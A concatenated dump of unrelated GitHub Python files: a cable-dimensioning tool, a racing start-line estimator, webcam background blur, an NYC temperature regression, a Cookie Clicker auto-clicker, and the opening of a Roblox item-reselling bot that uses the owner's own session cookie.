one with less section\n smallest = min (db_cabo_list, key=lambda cabolist: cabolist.section)\n\n #Apresentação de resultado\n print(\"PERMANENTE:\") \n show_cable(smallest)\n\n # Fim Contas regime permanente\n print(\"\\n\\n\")\n\ndef cc(meu_cabo,db_cabo_list):\n #Condição de CC\n if (meu_cabo.Mat == 0) | (meu_cabo.Mat == 2):\n #Cobre\n k_linha = 148\n elif (meu_cabo.Mat == 1) | (meu_cabo.Mat == 3):\n #Aluminio\n k_linha = 76\n else:\n print(\"Cabo configurado erradamente, volte a configurar\")\n return 0\n \n if meu_cabo.t_cc >=0 and meu_cabo.t_cc< 0.015: \n n=1\n m=1.5\n elif meu_cabo.t_cc >=0.015 and meu_cabo.t_cc< 0.02:\n n=0.96\n m=1.4\n elif meu_cabo.t_cc >=0.02 and meu_cabo.t_cc< 0.025:\n n=0.98\n m=1.38\n elif meu_cabo.t_cc >=0.025 and meu_cabo.t_cc< 0.03:\n m=1.2\n n=0.98\n elif meu_cabo.t_cc >=0.03 and meu_cabo.t_cc< 0.035:\n n=0.97\n m=1.10\n elif meu_cabo.t_cc >=0.035 and meu_cabo.t_cc< 0.04:\n m=1.10\n n=0.97\n elif meu_cabo.t_cc>=0.04 and meu_cabo.t_cc<0.045:\n m=0.98\n n=0.97\n elif meu_cabo.t_cc>=0.045 and meu_cabo.t_cc<0.05:\n m=0.90\n n=0.97\n elif meu_cabo.t_cc>=0.05 and meu_cabo.t_cc<0.055:\n m=0.8\n n=0.95\n elif meu_cabo.t_cc>=0.055 and meu_cabo.t_cc<0.06:\n m=0.77\n n=0.93\n elif meu_cabo.t_cc>=0.06 and meu_cabo.t_cc<0.065:\n m=0.77\n n=0.93\n elif meu_cabo.t_cc>=0.065 and meu_cabo.t_cc<0.07:\n m=0.7\n n=0.93\n elif meu_cabo.t_cc>=0.07 and meu_cabo.t_cc<0.075:\n m=0.63\n n=0.93\n elif meu_cabo.t_cc>=0.075 and meu_cabo.t_cc<0.08:\n m=0.61\n n=0.93\n elif meu_cabo.t_cc>=0.085 and meu_cabo.t_cc<0.09:\n m=0.6\n n=0.93\n elif meu_cabo.t_cc>=0.09 and meu_cabo.t_cc<0.1:\t\n m=0.6\n n=0.93\n elif meu_cabo.t_cc>=0.1 and meu_cabo.t_cc<0.2:\n m=0.4\n n=0.93\n elif meu_cabo.t_cc>=0.2 and meu_cabo.t_cc<0.3:\n m=0.3\n n=0.92\n elif meu_cabo.t_cc>=0.3 and meu_cabo.t_cc<0.4:\n m=0.18\n n=0.9\n elif meu_cabo.t_cc>=0.4 and meu_cabo.t_cc<0.5:\n m=0.15\n n=0.88\n elif meu_cabo.t_cc>=0.5 and meu_cabo.t_cc<0.6:\n m=0.10\n n=0.87\n elif meu_cabo.t_cc>=0.6 and meu_cabo.t_cc<0.7:\n m=0.08\n n=0.86\n elif meu_cabo.t_cc>=0.7 and meu_cabo.t_cc<0.8:\n m=0.07\n n=0.85\n elif meu_cabo.t_cc>=0.8 and meu_cabo.t_cc<0.9:\n m=0.05\n n=0.84\n elif meu_cabo.t_cc>=0.9 and meu_cabo.t_cc<1.0:\n m=0\n n=0.83\n else:\n m=0\n n=0.6\n \n meu_cabo.m = m\n meu_cabo.n = n\n meu_cabo.Ith = meu_cabo.Icc * math.sqrt(meu_cabo.m+meu_cabo.n)\n Sec_min_cc = meu_cabo.Ith*math.sqrt(meu_cabo.t_cc)/148\n for elem in db_cabo_list:\n if elem.section < Sec_min_cc:\n db_cabo_list.remove(elem)\n \n print(\"CONDIÇÃO DE CC: \")\n smallest = min (db_cabo_list, key=lambda cabolist: cabolist.section)\n show_cable(smallest)\n\n # pra cada valor de db_cabo_list precisa ver se é maior do que a secção\n\ndef esfTer(meu_cabo,db_cabo_list):\n global chepest\n meu_cabo.varTem = (meu_cabo.kLinha * (meu_cabo.Ith/chepest.section)*(meu_cabo.Ith/chepest.section)*meu_cabo.t_cc) + 45 \n chepest.F = chepest.section * (chepest.E*0.01) * chepest.alfa * meu_cabo.varTem\n chepest.Fk = (3.14159*3.14159*chepest.E*chepest.inercia/(meu_cabo.l*meu_cabo.l)) \n if chepest.F > chepest.Fk:\n chepest.F = (10*chepest.E*chepest.inercia)/(meu_cabo.l*(1+(chepest.alfa*meu_cabo.varTem))*meu_cabo.l*(1+(chepest.alfa*meu_cabo.varTem)))\n chepest.extremidade = math.sqrt((chepest.F*chepest.F)/4+(meu_cabo.fe*meu_cabo.fe)/4)\n chepest.intermedio = meu_cabo.fe\n print(\"\\n\\nESFORÇO TERMICO:\")\n show_cable(chepest)\n \n\n\nif __name__=='__main__':\n while(True):\n print_menu()\n option = ''\n try:\n option = int(input('Enter your choice: '))\n except:\n print('Wrong input. Please enter a number ...')\n #Check what choice was entered and act accordingly\n if option == 1:\n print('Thanks message before exiting')\n exit()\n elif option == 2:\n lerDB()\n elif option == 3:\n print(\"_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\\n\\n_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_\\n\\n\")\n intro(meu_cabo)\n permanente(meu_cabo)\n cc(meu_cabo)\n flexao(meu_cabo)\n ressonancia(meu_cabo)\n custo(meu_cabo)\n esfTer(meu_cabo)\n elif option == 4:\n caso()\n elif option == 5:\n sensibilidade()\n else:\n print('Invalid option. Please enter a number between 1 and 4.')\n\n\n# Não escreve daqui pra baixo\n","repo_name":"PedroSGui/Cable-dimencioning-tool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14675,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34492088581","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 23 15:45:23 2023\n\nfunctions to create, save, and load estimated start line locations, estimated\nfrom the post race GPS points data by finding the timestamp at which the\nsum of the squared velocities of all the runners is minimum.\n\nover many races, these coordinates can be overlayed on top of each other\nand a robust linear regression algorithm can quite accurately fit the\nexact location of the starting stalls.\n\nnote that this only works for flat races where a starting stall is used.\nfor jumps racing, an approach would have to simply find the timestamp\nand coordinates at which the P field begins to decrease for each runner.\n\n@author: George Swindells\n\"\"\"\n\nimport os\nimport json\nimport dateutil\nfrom datetime import datetime, timedelta\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import RANSACRegressor\n\nfrom ..feeds.utils import (\n compute_bearing,\n compute_mean_bearing,\n compute_new_coords,\n reduce_racetype,\n put_datetime\n )\nfrom ..feeds.postrace_feeds import GmaxFeed\nfrom .. import get_logger\nlogger = get_logger(name = __name__)\n\n\nos.environ[\"STARTLINE_COORDS_DIRECTORY\"] = (\n os.environ.get(\"STARTLINE_COORDS_DIRECTORY\")\n or os.path.join(os.environ[\"LOGS_DIR\"], \"startline_coords\")\n )\n\nif not os.path.exists(os.environ[\"STARTLINE_COORDS_DIRECTORY\"]):\n os.mkdir(os.environ[\"STARTLINE_COORDS_DIRECTORY\"])\n\n\ndef save_start_line(data: dict,\n race_type: str,\n directory: str = os.environ.get(\"STARTLINE_COORDS_DIRECTORY\")\n ) -> None:\n \"\"\"\n save a startline dictionary into the filesystem under the race type label\n which should be reduced.\n\n Parameters\n ----------\n data : dict\n dict of the startline coords\n race_type : str\n gmax race type label, reduced using reduce_racetype (checked).\n directory : str, optional\n directory into which to save the data.\n The default is os.environ.get(\"STARTLINE_COORDS_DIRECTORY\").\n \"\"\"\n race_type = reduce_racetype(race_type).lower().replace(\"/\", \"_\")\n path = os.path.join(directory, race_type + \".json\")\n with open(path, \"w\") as f:\n json.dump(data, f)\n\n\ndef load_start_line(race_type: str,\n directory: str = os.environ.get(\"STARTLINE_COORDS_DIRECTORY\")\n ) -> dict or None:\n \"\"\"\n load start line from the local start line coords directory\n\n Parameters\n ----------\n race_type : str\n gmax RaceType to load from the start line coords directory\n directory : str, optional\n directory from which to load the start line coords.\n The default is os.environ.get(\"STARTLINE_COORDS_DIRECTORY\")\n \"\"\"\n race_type = reduce_racetype(race_type).lower().replace(\"/\", \"_\")\n path = os.path.join(directory, race_type + \".json\")\n start_line = None\n if os.path.exists(path):\n with open(path, \"r\") as f:\n start_line = json.load(f)\n return start_line\n\n\ndef create_start_lines(gmax_feed: GmaxFeed,\n lower_date: datetime = datetime(2018,1,1),\n upper_date: datetime = datetime.today(),\n race_types: list = None,\n racecourses: list = None,\n offline: bool = True,\n off_times: dict = {},\n sample_size: int = 50\n ) -> dict:\n \"\"\"\n for the given daterange and specific race types/courses, compute\n new start line geometry from the post race GPS points and save them\n into the start line directory in environment variable STARTLINE_COORDS_DIRECTORY.\n\n Parameters\n ----------\n gmax_feed : GmaxFeed,\n GmaxFeed instance to use to fetch the racelist and the points\n from the local or remote sources.\n lower_date : datetime, optional\n lower date boundary for racelist query.\n The default is datetime(2018,1,1).\n upper_date : datetime, optional\n upper date boundary for racelist query.\n The default is datetime.today()\n race_types : list, optional\n list of specific race types to recreate.\n The default is None, and all race types are recreated.\n racecourses : list, optional\n list of specific racecourse to recreate.\n The default is None, and all records are recreated.\n offline : bool, optional\n parameter for GmaxFeed instance, if True no requests are sent to\n the Gmax APIs and only the local file system cache is used.\n The default is True.\n off_times : dict, optional\n dictionary of known off times for each race, as dict of sharecode\n to a datetime object of naive UTC.\n If given, this can be used to identify the starting stall GPS\n points instead of estimating the start point from the minimum\n velocities, and may be more accurate.\n The default is {}\n \"\"\"\n racelist = gmax_feed.get_racelist_range(\n start_date = lower_date,\n end_date = upper_date,\n offline = offline\n )\n # apply further filter conditions\n if racecourses:\n racecourses = set(racecourses)\n racelist = {\n sc: v for sc, v in racelist.items()\n if v[\"Racecourse\"] in racecourses\n }\n # group sharecodes into race types, and apply filter conditions\n race_type_groups = {\n reduce_racetype(row[\"RaceType\"]).lower(): []\n for row in racelist.values() if row[\"Published\"]\n }\n if race_types:\n race_types = set([reduce_racetype(rt).lower() for rt in race_types])\n race_type_groups = {\n k: v for k, v in race_type_groups.items()\n if k in race_types\n }\n for row in racelist.values():\n rt = reduce_racetype(row[\"RaceType\"]).lower()\n if rt in race_type_groups and row[\"Published\"]:\n race_type_groups[rt].append(row[\"I\"])\n # for each race type, fetch the points data (or a good sample size of it)\n for race_type, sharecodes in race_type_groups.items():\n # possible for some flat races to be flag start when stalls are broken,\n # but it's so rare that it should get buried by the stalls data\n is_jumps = any([\n x in race_type\n for x in [\"chase\", \"hurdle\", \"nh_flat\", \"nhflat\", \"nh flat\"]\n ])\n if len(sharecodes) > sample_size:\n sharecodes = np.random.choice(\n sharecodes,\n size = sample_size,\n replace = False\n )\n sharecodes = sharecodes.tolist()\n points = gmax_feed.get_data(\n sharecodes = sharecodes,\n request = {\"points\"},\n offline = offline\n ).get(\"points\")\n # find timestamp at which all runners are in the starting stalls.\n # for jumps races, due to the run-up, the logic will work a bit\n # differently, ensure the LOBF is parallel to the direction of\n # travel by taking subsequent timestamp around the point at which P\n # begins to decrease, then take the negative reciprocal of the gradient\n # which gives the gradient of the perpendicular line.\n # apply this to the average point at which P begins to decrease and\n # use that as the result.\n if is_jumps:\n all_coordinates = pd.DataFrame()\n all_bearings = []\n for sc, sc_points in points.items():\n if not sc_points:\n continue\n # find the timestamp at which runner P fields begin to decrease\n # and take runner coordinates at t-1 and t+1 to sample the init\n # bearing for each race, then cache the coords near the start line.\n # take negative reciprocal of the mean bearing for startline bearing\n # and use with average x,y to create a polynomial to go into the record.\n df = pd.DataFrame.from_records(sc_points)\n runners = list(set([row[\"I\"] for row in sc_points]))\n max_p = df.P.max()\n df2 = df[df.P < max_p]\n runner_start_timestamps = df2[[\"I\", \"T\"]].groupby(\"I\").min()\n runner_start_timestamps.loc[\n runner_start_timestamps.index,\n \"T\"\n ] = runner_start_timestamps[\"T\"].apply(\n dateutil.parser.parse\n )\n ts1 = [\n put_datetime(x)\n for x in\n (runner_start_timestamps - timedelta(seconds = 1))[\"T\"].to_list()\n ]\n ts2 = [\n put_datetime(x)\n for x in\n (runner_start_timestamps + timedelta(seconds = 1))[\"T\"].to_list()\n ]\n df3 = df.set_index([\"I\", \"T\"])\n for t1, t2, runner_sc in zip(ts1, ts2, runner_start_timestamps.index):\n try:\n init_coords = df3.loc[(runner_sc, t1), [\"X\", \"Y\"]]\n final_coords = df3.loc[(runner_sc, t2), [\"X\", \"Y\"]]\n except Exception:\n logger.exception(\n \"Error occurred accessing runner_sc timestamp for coords: {0}\".format(\n (runner_sc, t1, t2)\n )\n )\n continue\n b = compute_bearing(\n coords1 = (init_coords[\"X\"], init_coords[\"Y\"]),\n coords2 = (final_coords[\"X\"], final_coords[\"Y\"])\n )\n x = np.mean([init_coords[\"X\"], final_coords[\"X\"]])\n y = np.mean([init_coords[\"Y\"], final_coords[\"Y\"]])\n all_bearings.append(b)\n all_coordinates = pd.concat(\n (all_coordinates, pd.DataFrame({\"X\": [x], \"Y\": [y]}))\n )\n if all_bearings:\n all_bearings = np.array(all_bearings)\n mean_bearing = compute_mean_bearing(\n all_bearings[np.isfinite(all_bearings)]\n )\n if np.isnan(mean_bearing):\n continue\n perpendicular_bearing = mean_bearing + (np.pi/2)\n xy1 = (\n np.mean(all_coordinates.X),\n np.mean(all_coordinates.Y)\n )\n xy2 = compute_new_coords(\n X1 = xy1[0],\n Y1 = xy1[1],\n D = 5,\n B = perpendicular_bearing\n )\n xy3 = compute_new_coords(\n X1 = xy1[0],\n Y1 = xy1[1],\n D = -5,\n B = perpendicular_bearing\n )\n # fit linear regressor to get gradient and intercept\n poly = np.polyfit(\n x = [xy1[0], xy2[0], xy3[0]],\n y = [xy1[1], xy2[1], xy3[1]],\n deg = 1\n )\n start_line_coords = {\n \"poly\": [\n poly[0],\n poly[1]\n ],\n \"xy1\": list(xy2),\n \"xy2\": list(xy3)\n }\n # save the startline coords for this racetype in the filesystem\n save_start_line(\n data = start_line_coords, \n race_type = race_type\n )\n else:\n continue\n else:\n all_coordinates = pd.DataFrame()\n for sc, sc_points in points.items():\n if not sc_points:\n continue\n # identify timestamp in the stalls and extract coords\n start_distance = max([row[\"P\"] for row in sc_points]) - 2.\n timestamp_boundary = min([\n dateutil.parser.parse(row[\"T\"]) for row in sc_points\n ]) + timedelta(seconds = 30)\n runners = list(set([\n row[\"I\"] for row in sc_points\n if row[\"P\"] > start_distance\n and dateutil.parser.parse(row[\"T\"]) < timestamp_boundary\n and row[\"V\"] < 2.\n ]))\n start_timestamp = off_times.get(sc)\n if not start_timestamp:\n df = pd.DataFrame.from_records(sc_points)\n df = df[\n (df.P > start_distance) & (df.V < 2.)\n ]\n if len(df) == 0:\n continue\n runner_count = df[[\"T\", \"I\"]].groupby(\"T\").count().reset_index()\n valid_timestamps = runner_count[runner_count.I == len(runners)][\"T\"]\n tempdf = df.loc[\n df[\"T\"].isin(valid_timestamps),\n [\"T\", \"V\"]\n ]\n tempdf = tempdf.assign(\n V2 = np.power(tempdf.V, 2)\n )\n if len(tempdf) == 0:\n continue\n sum_sq_v = tempdf.groupby(\"T\").sum()\n min_sum_sq_v = sum_sq_v[sum_sq_v[\"V2\"] == sum_sq_v[\"V2\"].min()]\n if min_sum_sq_v.index.empty:\n continue\n start_timestamp = min_sum_sq_v.index[0]\n else:\n start_timestamp -= timedelta(seconds = 1.5)\n start_timestamp = (\n start_timestamp - timedelta(\n microseconds = start_timestamp.microsecond\n )\n )\n start_timestamp = put_datetime(start_timestamp)\n start_coords = df.loc[\n df[\"T\"] == start_timestamp,\n [\"T\", \"X\", \"Y\"]\n ]\n all_coordinates = pd.concat((all_coordinates, start_coords))\n if all_coordinates.empty:\n logger.info(\"all_coordinates dataframe is empty: {0}\".format(race_type))\n continue\n # once all coords have been extracted, find average X and Y.\n av_x = all_coordinates.X.mean()\n av_y = all_coordinates.Y.mean()\n # translate each race onto the average X and Y for the racetype, to\n # eliminate small placement errors in the starting stall location\n group_differences_x = (\n all_coordinates[[\"T\", \"X\"]].groupby(\"T\").mean() - av_x\n ).reset_index()\n group_differences_y = (\n all_coordinates[[\"T\", \"Y\"]].groupby(\"T\").mean() - av_y\n ).reset_index()\n \n tempdf_x = group_differences_x.merge(\n all_coordinates[[\"T\", \"X\"]],\n on = \"T\",\n suffixes = (\"_left\", \"_right\")\n )\n translated_x = tempdf_x[\"X_right\"] - tempdf_x[\"X_left\"]\n \n tempdf_y = group_differences_y.merge(\n all_coordinates[[\"T\", \"Y\"]],\n on = \"T\",\n suffixes = (\"_left\", \"_right\")\n )\n translated_y = tempdf_y[\"Y_right\"] - tempdf_y[\"Y_left\"]\n # fit the initial LOBF on the translated data\n x = translated_x.to_numpy().reshape(-1, 1)\n y = translated_y.to_numpy().reshape(-1, 1)\n poly_rls = RANSACRegressor()\n poly_rls.fit(x, y)\n start_line_coords = {\n \"poly\": [\n poly_rls.estimator_.coef_[0][0],\n poly_rls.estimator_.intercept_[0]\n ],\n \"xy1\": None,\n \"xy2\": None\n }\n poly = np.poly1d(start_line_coords[\"poly\"])\n observations = len(x)\n lower_x = np.sort(x)[int(observations * 0.2)]\n upper_x = np.sort(x)[int(observations * 0.8)]\n start_line_coords[\"xy1\"] = [float(lower_x), float(poly(np.min(lower_x)))]\n start_line_coords[\"xy2\"] = [float(upper_x), float(poly(np.max(upper_x)))]\n # save the startline coords for this racetype in the filesystem\n save_start_line(\n data = start_line_coords, \n race_type = race_type\n )\n","repo_name":"TotalPerformanceData/gmaxfeed","sub_path":"gmaxfeed/derivatives/start_line.py","file_name":"start_line.py","file_ext":"py","file_size_in_byte":16652,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"74099630332","text":"import cv2\nimport mediapipe as mp\nimport numpy as np\n\nmp_selfie = mp.solutions.selfie_segmentation\nmodel = mp_selfie.SelfieSegmentation()\n\ncap = cv2.VideoCapture(0)\nwhile cap.isOpened():\n ret, frame = cap.read()\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n res = model.process(frame)\n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n mask = np.stack((res.segmentation_mask,) * 3, axis=-1) > 0.5\n segmented_image = np.where(mask, frame, cv2.blur(frame, (40, 40)))\n\n cv2.imshow(\"blur\", segmented_image)\n\n if cv2.waitKey(10) & 0xFF is 27:\n break\ncap.release()\ncv2.destroyAllWindows()","repo_name":"vinal-gadhiya/mediapipe_projects","sub_path":"selfie_segmentation.py","file_name":"selfie_segmentation.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32539334192","text":"import pandas as pd\n\nnyc_average_yearly = pd.read_csv(\"ave_yearly_temp_nyc_1895-2017.csv\")\nnyc_january = pd.read_csv(\"ave_hi_nyc_jan_1895-2018.csv\")\n\n# Floor the Date values for the average yearly temp\nnyc_average_yearly.Date = nyc_average_yearly.Date.floordiv(100)\n\n# Split the dataset into training and test data for the january and yearly average temperaturs\nfrom sklearn.model_selection import train_test_split\n\n# Average Yearly\nX_train, X_test, y_train, y_test = train_test_split(\n nyc_average_yearly.Date.values.reshape(-1, 1),\n nyc_average_yearly.Value.values,\n random_state=11,\n)\n\n# January Average\nX_jan_train, X_jan_test, y_jan_train, y_jan_test = train_test_split(\n nyc_january.Date.values.reshape(-1, 1),\n nyc_january.Temperature.values,\n random_state=11,\n)\n\n\n# Run the linear regression\nfrom sklearn.linear_model import LinearRegression\n\nlinear_regression = LinearRegression()\nlinear_regression_jan = LinearRegression()\n\n# the fit method epects the samples and the targets for training\nlinear_regression.fit(X=X_train, y=y_train)\nlinear_regression_jan.fit(X=X_jan_train, y=y_jan_train)\n\npredicted = linear_regression.predict(X_test)\nexpected = y_test\n\npredicted_jan = linear_regression_jan.predict(X_jan_test)\nexpected_jan = y_jan_test\n\n\n# lambda implements y=mx+b\npredict = lambda x: linear_regression.coef_ * x + linear_regression.intercept_\npredict_jan = (\n lambda x: linear_regression_jan.coef_ * x + linear_regression_jan.intercept_\n)\n\n# Visualize the two scatter plots\nimport matplotlib.pyplot as plt\n\nfig, ax = plt.subplots(2, figsize=(10, 6))\n\nfig.suptitle(\n \"1895-2018: Comparing Average Yearly Temperature and Average Temperature in January\",\n fontsize=14,\n)\n\nax[0].scatter(\n x=nyc_average_yearly[\"Date\"], y=nyc_average_yearly[\"Value\"], c=\"darkgreen\"\n)\nax[0].set_xlabel(\"Year\")\nax[0].set_ylabel(\"Average Yearly Temperature\")\nax[0].set_ylim(10, 70)\n\nax[1].scatter(x=nyc_january[\"Date\"], y=nyc_january[\"Temperature\"], c=\"darkgreen\")\nax[1].set_xlabel(\"Year\")\nax[1].set_ylabel(\"Average January Temperature\")\n\nplt.ylim(10, 70)\n\n# Add the trend lines\nimport numpy as np\n\nx = np.array([min(nyc_average_yearly.Date.values), max(nyc_average_yearly.Date.values)])\ny = predict(x)\n\nx_jan = np.array([min(nyc_january.Date.values), max(nyc_january.Date.values)])\ny_jan = predict_jan(x_jan)\n\nline = ax[0].plot(x, y, c=\"mediumseagreen\", linewidth=2)\nline2 = ax[1].plot(x_jan, y_jan, c=\"mediumseagreen\", linewidth=2)\n\nplt.show()\n","repo_name":"boluwaji11/ML-Exercise","sub_path":"temp_comparison.py","file_name":"temp_comparison.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37944001549","text":"from selenium import webdriver\r\nimport time\r\n\r\ndriver_chrome = 'devSelenium\\chromedriver.exe'\r\nurl_cookie = 'https://orteil.dashnet.org/cookieclicker/'\r\n\r\n\r\ndriver = webdriver.Chrome(executable_path=driver_chrome)\r\n\r\ndriver.get(url=url_cookie)\r\n\r\n# drivers\r\nclick_cookie = driver.find_element_by_id('bigCookie')\r\ncookies = driver.find_element_by_xpath('//*[@id=\"cookies\"]')\r\n\r\n\r\n\r\n\r\ndef get_cookies():\r\n cokies_number = cookies.text.split('\\n')\r\n cokies_number = cokies_number[0].split(' ')\r\n cokies_number = cokies_number[0]\r\n return cokies_number[0]\r\n\r\n\r\ndef buy_upgrade():\r\n upgrades = driver.find_elements_by_id('upgrades')\r\n for upg in upgrades:\r\n upg.click()\r\n\r\ndef buy_products():\r\n produtcs=driver.find_elements_by_id('products')\r\n for prod in produtcs:\r\n prod.click()\r\n\r\n\r\ncookies_number = 0\r\nk = 100\r\nwhile(True):\r\n click_cookie.click()\r\n if(k==0):\r\n buy_upgrade()\r\n buy_products()\r\n k=100\r\n k -=1\r\n\r\ndriver.quit()\r\n","repo_name":"rubensilva091/Python","sub_path":"100DaysPython Course/2.Intermediate 15-58/d48 Selenium/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43459537067","text":"try:\n import requests, os, sys, json, time, threading, copy\n from colorama import Fore, Style\n from rgbprint import gradient_print\nexcept ModuleNotFoundError as error:\n os.system(\"pip install requests colorama rgbprint\")\n os.execv(sys.executable, [sys.executable] + [sys.argv[0]] + sys.argv[1:])\n\nsettings = json.load(open(\"settings.json\", \"r\"))\ncollectable_types = [\n 8,\n 42,\n 43,\n 44,\n 45,\n 46,\n 47,\n 41,\n 64,\n 65,\n 68,\n 67,\n 66,\n 69,\n 72,\n 70,\n 71\n]\nsell_methods = [\n \"CUSTOM\",\n \"UNDERCUT\",\n \"MEWTVALUES\"\n]\n\nclass MewtStyle():\n MAIN = f\"\\x1b[38;2;247;184;207m\"\n\n\nclass Webhook:\n def __init__(self, webhook):\n self.webhook = webhook\n\n def post(self, buyer_name, buyer_id, item_name, item_id, item_thumbnail, price):\n payload = {\n \"embeds\": [\n {\n \"title\": f\"Sold {item_name}!\",\n \"description\": f\"`earned`: **{price}**\\n`buyer`: **[{buyer_name}](https://www.roblox.com/users/{buyer_id})**\",\n \"url\": f\"https://www.roblox.com/catalog/{item_id}\",\n \"color\": 16234703,\n \"thumbnail\": {\n \"url\": item_thumbnail\n }\n }\n ]\n }\n \n with requests.session() as session:\n session.post(self.webhook, json=payload)\n\nclass Client:\n def __init__(self):\n self.version = \"1.0.1\"\n self.title = (f\"\"\"\n d8, \n d8P `8P \n d888888P \n 88bd8b,d88b d8888b ?88 d8P d8P ?88' ?88, 88P d88 d888b8b ?88 d8P d888b8b \n 88P'`?8P'?8bd8b_,dP d88 d8P' d8P' 88P `?8bd8P' ?88 d8P' ?88 d88 d8P'd8P' ?88 \n d88 d88 88P88b ?8b ,88b ,88' 88b d8P?8b, 88b 88b ,88b ?8b ,88' 88b ,88b \nd88' d88' 88b`?888P' `?888P'888P' `?8b d8P' `?8b `88b`?88P'`88b`?888P' `?88P'`88b\n )88 \n ,88P \n `?888P\n \n discord.gg/mewt & discord.gg/javaw - v{self.version} \n \"\"\")\n\n self.ready = False \n self.sell_method = settings[\"SELL_METHOD\"]\n self.custom_values = settings[\"CUSTOM_VALUES\"]\n self.mewtvalue_multiplier = settings[\"MEWTVALUE_MULTIPLIER\"]\n self.whitelist = settings[\"WHITELIST\"]\n self.blacklist = settings[\"BLACKLIST\"]\n self.webhook_enabled = settings[\"WEBHOOK\"][\"ENABLED\"]\n self.webhook_url = settings[\"WEBHOOK\"][\"URL\"]\n self.client = {\n \"cookie\": settings[\"COOKIE\"],\n \"auth\": \"abcabcabc\",\n \"name\": \"abcabcabc\",\n \"id\": 0\n }\n self.inventory = {}\n self.last_transaction_id = None\n self.raw_inventory = []\n self.onsale = []\n self.mewt_collection = []\n self.mewt_collection_reversed = []\n \n\n self.id_to_name = {}\n self.collectable_id_to_name = {}\n\n self.collectable_instance_id_to_product_id = {}\n\n self.collectable_id_to_id = {}\n\n self.webhook = None\n\n self.session = requests.session()\n self.session.cookies['.ROBLOSECURITY'] = self.client[\"cookie\"]\n\n self.resellable_count = 0\n self.logs = []\n\n if self.webhook_enabled:\n self.webhook = Webhook(self.webhook_url)\n\n if(self.sell_method not in sell_methods):\n print(\"Invalid sell method, accepted sale here are the accepted sell methods; \" + \", \".join([value for value in sell_methods]))\n time.sleep(1)\n raise SystemExit\n \n if(self.sell_method == \"MEWTVALUES\" and self.mewtvalue_multiplier < 1):\n print(\"Your mewt value multiplier is less than 1, it needs to be above one or you will loose robux\")\n time.sleep(1)\n raise SystemExit\n \n if(self.sell_method == \"CUSTOM\" and len(self.custom_values) <= 0):\n print(\"You need add custom values to support your sell method\")\n time.sleep(1)\n raise SystemExit\n\n\n self.verify_cookie()\n while self.ready != True:\n time.sleep(1)\n\n \n self.infinite_thread(self.update_status, 1)\n self.infinite_thread(self.set_token, 200)\n self.infinite_thread(self.fetch_mewt_collection, 10 * 60)\n\n self.logs.append(f\"Logged in as {self.client['name']}({self.client['id']})\")\n self.logs.append(\"Fetching inventory this may take a minute, please wait.\")\n self.infinite_thread(self.update_inventory, 15 * 60)\n self.infinite_thread(self.sell_all_items, 5)\n self.infinite_thread(self.scan_recent_transactions, 3 * 60)\n\n def update_status(self):\n os.system('cls' if os.name=='nt' else 'clear')\n gradient_print(self.title, start_color=(0xFF6EA3), end_color=(0xF7B8CF))\n print(Fore.RESET + Style.RESET_ALL)\n print(Style.BRIGHT + f\"> Current User: {MewtStyle.MAIN}{Style.BRIGHT}{self.client['name']}{Fore.WHITE}{Style.BRIGHT} \")\n print(Style.BRIGHT + f\"> Resellable Items: {MewtStyle.MAIN}{Style.BRIGHT}{self.resellable_count}{Fore.WHITE}{Style.BRIGHT} \")\n print(Style.BRIGHT + f\"> Sell Method: {MewtStyle.MAIN}{Style.BRIGHT}{self.sell_method}{Fore.WHITE}{Style.BRIGHT} \")\n print()\n print(Style.BRIGHT + f\"> Logs: {MewtStyle.MAIN}{Style.BRIGHT}\\n\" + \"\\n\".join(log for log in self.logs[-10:]) + f\"{Fore.WHITE}{Style.BRIGHT}\")\n\n def fetch_mewt_collection(self):\n conn = requests.get(\"https://mewt.manlambo13.repl.co/collectables\")\n if(conn.status_code == 200):\n data = conn.json()\n self.mewt_collection = { item[\"id\"]: item for item in data }\n self.mewt_collection_reversed = { item[\"collectibleItemId\"]: item for item in data }\n self.logs.append(\"Successfully fetched mewt collectable database\")\n else:\n time.sleep(5)\n return self.fetch_mewt_collection()\n \n def find_mewtdata_by_id(self, id):\n if len(self.mewt_collection) <= 0:\n time.sleep(1)\n return self.find_mewtdata_by_id(id)\n \n if id in self.mewt_collection:\n return self.mewt_collection[id]\n else:\n return None\n \n def find_mewtdata_by_collectable_item_id(self, collectibleItemId):\n if len(self.mewt_collection_reversed) <= 0:\n time.sleep(1)\n return self.find_mewtdata_by_id(collectibleItemId)\n \n if collectibleItemId in self.mewt_collection_reversed:\n return self.mewt_collection_reversed[collectibleItemId]\n else:\n return None\n\n def verify_cookie(self):\n conn = self.session.get(\"https://users.roblox.com/v1/users/authenticated\")\n if(conn.status_code == 200):\n data = conn.json()\n self.client[\"id\"] = data[\"id\"]\n self.client[\"name\"] = data[\"name\"]\n self.ready = True\n else:\n print(\"Invalid cookie or please wait a minute and trying again\")\n time.sleep(1)\n raise SystemExit\n \n def set_token(self):\n try:\n conn = self.session.post(\"https://friends.roblox.com/v1/users/1/request-friendship\")\n if(conn.headers.get(\"x-csrf-token\")):\n self.client[\"auth\"] = conn.headers[\"x-csrf-token\"]\n self.session.headers[\"x-csrf-token\"] = conn.headers[\"x-csrf-token\"]\n except:\n time.sleep(5)\n return self.set_token()\n\n def scan_recent_transactions(self):\n try:\n conn = self.session.get(f\"https://economy.roblox.com/v2/users/{self.client['id']}/transactions?cursor=&limit=100&transactionType=Sale\")\n if(conn.status_code == 200):\n conn_data = conn.json()\n data = conn_data[\"data\"]\n if self.last_transaction_id is None:\n self.last_transaction_id = data[0][\"idHash\"]\n return \n 